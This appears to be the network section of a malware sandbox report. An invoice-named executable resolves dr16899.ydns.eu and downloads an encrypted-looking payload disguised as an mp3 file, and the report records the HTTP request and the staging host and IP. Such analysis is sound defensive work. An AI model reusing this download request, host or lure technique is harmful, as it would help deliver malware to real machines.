Mar 10, 2025 09:03:16.774817944 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.774831057 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.774934053 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.774950981 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.775279999 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.777045012 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.809415102 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.809432983 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.809439898 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.809524059 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.809525967 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.809535980 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.809609890 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.809652090 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.809663057 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.809703112 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.809758902 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.809768915 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.809807062 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.809900999 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.809911966 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.809938908 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.809993029 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.810003996 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.810034990 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.810142994 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.810162067 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.810172081 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.810180902 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.810193062 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.810235023 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.810235023 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.810359001 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.810457945 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.810470104 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.810478926 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.810488939 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.810501099 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.810511112 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.810520887 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.810538054 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.810538054 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.810571909 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.810863972 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.810873985 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.810883045 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.810893059 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.810911894 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.810920000 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.810921907 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.810933113 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.810944080 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.810971022 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.810971022 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.811011076 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.811464071 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.811475039 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.811490059 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.811492920 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.811497927 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.811505079 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.811511040 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.811517000 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.811518908 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.811527014 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.811701059 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.811866999 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.811877966 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.811887980 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.811899900 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.811909914 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.811925888 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.811952114 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.811985016 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.812005043 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.812015057 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.812026978 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.812037945 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.812047005 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.812057972 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.812072992 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.812072992 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.812077045 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.812083960 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.812091112 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.812093973 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.812127113 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.812127113 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.812196016 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.812998056 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.813009024 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.813026905 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.813035011 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.813040972 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.813045979 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.813047886 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.813050985 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.813055992 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.813067913 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.813071012 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.813081026 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.813091993 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.813093901 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.813102961 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.813116074 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.813116074 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.813127041 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.813136101 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.813165903 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.813165903 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.813927889 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.813941002 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.813951015 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.813961983 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.813971996 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.813983917 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.813993931 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.814004898 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.814014912 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.814017057 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.814026117 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.814038038 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.814049959 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.814052105 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.814059019 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.814060926 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.814074039 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.814085960 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.814089060 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.814119101 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.814119101 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.814774036 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.814786911 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.814798117 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.814810038 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.814826012 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.814837933 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.814847946 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.814847946 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.814847946 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.814858913 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.814951897 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.848288059 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.870170116 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.870201111 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.870212078 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.870258093 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.870337009 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.870347977 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.870357990 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.870368004 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.870373964 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.870420933 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.870577097 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.870589018 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.870646954 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.870656967 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.870666981 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.870677948 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.870687008 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.870688915 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.870688915 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.870773077 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.870773077 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.905267954 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.905323982 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.905334949 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.905395985 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.905436039 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.905495882 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.905512094 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.905520916 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.905530930 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.905666113 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.905674934 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.905684948 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.905704021 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.905713081 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.905724049 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.905745983 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.905745983 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.905781031 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.905965090 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.905975103 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.906079054 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.906100988 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.906111002 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.906121016 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.906131983 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.906151056 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.906161070 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.906171083 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.906171083 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.906172991 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.906183004 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.906193972 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.906219959 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.906239033 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.906764030 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.906773090 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.906781912 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.906791925 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.906801939 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.906811953 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.906822920 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.906829119 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.906829119 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.906832933 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.906845093 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.906855106 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.906864882 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.906868935 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.906868935 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.906874895 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.906888008 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.906897068 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.906900883 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.906925917 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.906925917 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.907533884 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.907543898 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.907555103 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.907563925 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.907574892 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.907583952 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.907589912 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.907594919 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.907604933 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.907613993 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.907623053 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.907624006 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.907624006 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.907634974 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.907644987 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.907654047 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.907659054 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.907659054 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.907666922 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.907696009 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.908129930 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.908291101 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.908299923 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.908318043 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.908329010 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.908339024 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.908349037 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.908349991 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.908365011 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.908375025 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.908387899 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.908390999 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.908390999 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.908396959 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.908409119 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.908417940 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.908427000 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.908437967 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.908497095 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.909235954 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.909245014 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.909255028 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.909264088 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.909272909 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.909284115 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.909288883 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.909293890 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.909303904 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.909313917 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.909323931 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.909332991 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.909343004 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.909347057 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.909347057 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.909353971 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.909364939 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.909374952 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.909374952 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.909437895 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.910128117 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.910139084 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.910149097 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.910159111 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.910168886 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.910180092 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.910188913 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.910198927 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.910207987 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.910223961 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.910224915 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.910224915 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.910233021 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.910243034 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.910253048 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.910254955 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.910263062 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.910273075 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.910284042 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.910295010 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.910295010 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.910378933 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.910887957 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.910901070 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.911098003 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.930357933 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.968194962 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.968224049 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.968236923 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.968324900 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:17.023127079 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:20.748039961 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:20.748140097 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:30.861715078 CET	49712	80	192.168.2.4	45.144.214.104

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 10, 2025 09:03:14.954701900 CET	49323	53	192.168.2.4	1.1.1.1
Mar 10, 2025 09:03:14.968950033 CET	53	49323	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 10, 2025 09:03:14.954701900 CET	192.168.2.4	1.1.1.1	0x33c6	Standard query (0)	dr16899.ydns.eu	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 10, 2025 09:03:14.968950033 CET	1.1.1.1	192.168.2.4	0x33c6	No error (0)	dr16899.ydns.eu		45.144.214.104	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

dr16899.ydns.eu

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49712	45.144.214.104	80	7828	C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe

Timestamp	Bytes transferred	Direction	Data
Mar 10, 2025 09:03:14.981249094 CET	94	OUT	GET /1/12/panel/uploads/Hggvtg.mp3 HTTP/1.1 Host: dr16899.ydns.eu Connection: Keep-Alive
Mar 10, 2025 09:03:15.734395981 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 10 Mar 2025 08:03:15 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Mon, 10 Mar 2025 04:26:25 GMT ETag: "fae10-62ff560142c52" Accept-Ranges: bytes Content-Length: 1027600 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: audio/mpeg Data Raw: 1f 61 59 4c d0 7e de fa d4 a6 d2 07 13 04 52 7d 3e 99 4b 40 90 6c 61 16 8b 33 d8 ac d1 41 a9 8c 26 76 31 01 7d 05 81 5a 00 df fb 90 e2 d3 8d 52 cb 22 cb 76 d7 83 9e 29 4c 5d b8 f3 12 97 0f bc bc 76 23 86 1e 85 c2 83 63 19 5b 29 e0 7e bd 86 19 f9 5a cd 1f dc fb 82 6a b9 ff 40 5e 55 27 d4 49 ff 69 df a9 b5 a8 8a f0 0f 2d cd 27 f6 21 54 a1 0e e9 14 18 dd f0 6e b2 9a 72 e9 34 59 31 81 0e 43 e3 19 39 f8 94 a9 0f 39 34 de a8 73 52 5b 68 52 f8 f1 27 5b aa f9 c1 1b b9 43 1b b5 06 58 4e d6 01 08 3a 22 ac 